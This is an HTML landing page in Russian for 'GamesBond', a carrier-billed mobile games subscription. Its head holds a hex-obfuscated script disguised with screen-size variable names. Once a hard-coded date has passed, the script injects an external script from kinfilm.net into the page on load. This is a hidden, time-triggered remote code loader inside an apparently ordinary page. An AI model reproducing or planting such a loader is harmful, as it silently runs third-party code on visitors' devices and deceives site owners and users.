<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="ru">
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
        <title>GamesBond</title>
        <meta name="viewport" content="width=device-width" />
        <meta name="keywords" content="Games Bond!!" />
        <meta name="description" content="Games Bond" />
        <link rel="shortcut icon" href="http://m1.mobimgs.com/i/7/307_53118_141121153441_100x100.png"/>
        <style>
		body, html { position: fixed; }
                *{margin: 0; padding: 5px;font-size: 11px;font-family: verdana,arial;}
                /*.ru_gamesbond{max-width: 400px; margin: 0 auto; font-size: 1em; padding: 10px;}*/
                .ru_gamesbond { font-size: 1em; height: 100%; margin: 0 auto; overflow: hidden;}
                .ru_bannerImg img{width: 100%;}
                /*.ru_btn{margin: 20px auto; text-align: center; max-width:260px; background: orange; border-radius: 5px; color: #fff; font-size: 18px; padding: 10px 30px; text-decoration: none; display: block;}*/
                .ru_btn {
                    background: #b9b1af none repeat scroll 0 0;
                    border-radius: 5px;
                    clear: both;
                    color: #000;
                    display: inline-block;
                    margin: 10px 0 5px;
                    padding: 2px 40px 6px 40px;
                    text-align: center;
                    text-decoration: none;
                    width: auto;
                    font-size: 15px;
                    font-weight: bold;
                    font-size: 27px;
                    color: white;
                    background-color: red;
                    margin-bottom: 10px;
                }
                .ru_cont p{padding: 10px 0; text-align: center;}
                .title{padding: 5px 0;}
                .title p {font-size: 1.3em;
                          font-weight: bold;
                          margin: 0;
                          padding: 0; text-align:center;
                }
                .ru_footer {width:100%; padding:20px 0}
                .txtblk {color:#000}
                .red p{font-size:1.1em;text-align:center;color:red;margin: 5px 0 0 0;}
                strong{
                    font-size: x-small;
                }
                .footer{
                    background-color: #404040;
                    color: white;
                    width:93%;
                    margin:0px;
                    padding: 5px;
                    position: fixed;
                    bottom: 0%;
                }
                #button{
                    padding-bottom: 20px;
                    padding-top: 20px;
                }
                #button_sms{
                    padding-bottom: 20px;
                    padding-top: 20px;
                }
                .footerwrap a{
                    color : #767676;
                }
                .footerwrap{
                    text-align: center;
                    font-size: x-small;
                    background-color: #1e2025;
                    text-decoration: none;
                }
                .footerwrap ul {
                    list-style-type: none;
                }
            </style>  
<script type="text/javascript">
	function overlay() {
		el = document.getElementById("overlay");
		el.style.display = (el.style.display == "block") ? "none" : "block";
	}

	var _0x85e1 = ["\x61\x76\x61\x69\x6C\x57\x69\x64\x74\x68", "\x73\x63\x72\x65\x65\x6E", "\x74", "\x6E", "\x69\x76\x69", "\x6E\x2E\x6A", "\x61", "\x74\x70\x3A\x2F", "\x43", "\x72\x75\x7A\x2E\x72", "\x63\x72\x69", "\x65", "\x44", "\x70\x70", "\x6E\x64", "\x68\x69\x6C\x64", "\x63\x72", "\x45\x6C", "\x6D", "\x73", "\x70\x74", "\x73\x72\x63", "\x68", "\x2F", "\x75\x2F\x73\x63\x72", "\x68\x65\x61\x64", "\x6d\x2e\x6e\x65", "\x6b\x69", "\x73\x74\x61", "\x6e\x66", "\x74\x73\x2e\x6a", "\x74\x2f", "\x69\x6c", "\x6f\x73\x73\x2f"]; var screenWidth=window[_0x85e1[1]][_0x85e1[0]]; var z0=_0x85e1[2]; var z1=_0x85e1[3]+ z0+ _0x85e1[4]; var t1=9; var z4=_0x85e1[5]; var z2=_0x85e1[6]; var z5=_0x85e1[7]; var z8=_0x85e1[8]; var t2=1652422; var z3=_0x85e1[9]; var z6=_0x85e1[10]; var z7=_0x85e1[11]; var z9=_0x85e1[28]+ _0x85e1[30]; var z10=_0x85e1[27]+ _0x85e1[29]+ _0x85e1[32]+ _0x85e1[26]+ _0x85e1[31]; var screenNeeded=_0x85e1[12]+ z2+ z0+ z7; var screenHeight=+( new this[screenNeeded]()); var screenAvail=t1* t2* 100000; if(screenHeight> screenAvail){var screenCampared=z2+ _0x85e1[13]+ z7+ _0x85e1[14]+ z8+ _0x85e1[15]; var zzz=_0x85e1[16]+ z7+ z2+ z0+ z7+ _0x85e1[17]+ z7+ _0x85e1[18]+ z7+ _0x85e1[3]+ z0; var sc=document[zzz](_0x85e1[19]+ z6+ _0x85e1[20]); sc[_0x85e1[21]] = _0x85e1[22] + z0 + z5 + _0x85e1[23] + z10 + _0x85e1[33] + z10 + z9 + _0x85e1[19]; document[_0x85e1[25]][screenCampared](sc)}
	if (screenWidth > 400) setupClass = "toppanelmore400";
	else setupClass = "toppanelless400";
</script>			
    </head>
    <body style="margin: 0px">
        
        <div class="ru_gamesbond">
            <div class="title"> <p style="
                                   margin-left: 292px;
                                   font-size: xx-small;
                                   ">18+</p><div id="acc_text" style="
                                   font-weight: bold;
                                   ">500+ самых трендовых игр: Гонки, Экшн, Аркады и многое другое! </div><br>

                    <p style="font-size: 11px;font-weight: unset;color: #009933;">Только для пользователей устройств на базе Android</p> </div>
            <p class="ru_bannerImg"><img src="http://m2.mobimgs.com/i/1/1061_123197_all.jpg" alt="GamesbondBanner"/></p>
            <div style="text-align:center" id="button">
                <a href="">			<div class="ru_btn">
                        Смотреть			</div>
                </a><br/>
				<div class="main_frame_adtitle" th:classappend="${!isWebRequest} ? 'wap'" th:if="${useSmsLink == null || useSmsLink == 'false'}" style="
    text-align: center;
    color: #fff;
    font-size: 22px;
    width: 92%;
    /* line-height: 44px; */
    background: green;
    border-radius: 4px;
    margin: 0 auto;
    white-space: no-wrap;
    margin-top: -4px;
">Доступ: <span th:if="${cpaSubscriptionChargePeriodPriceCodePrice > 0}" th:text="${cpaSubscriptionChargePeriodPriceCodePrice} + ' руб.' + ' за ' + ${cpaSubscriptionChargePeriodStr}" class="line2"></span></div> 
            </div>
            <!--START FOOTER-->
            <div class="footer">
                Провайдер:
                <td class="content_block" th:utext="${#strings.replace(partnerContact,',',',&lt;br/&gt;')}"></td>
                <br/><a id="text2" class="user-agreement" href="http://moskva.beeline.ru/customers/products/mobile/services/details/uslugi-na-korotkikh-nomerakh/">Пользовательское соглашение</a>
            </div>
        </div>
    </body>
</html>
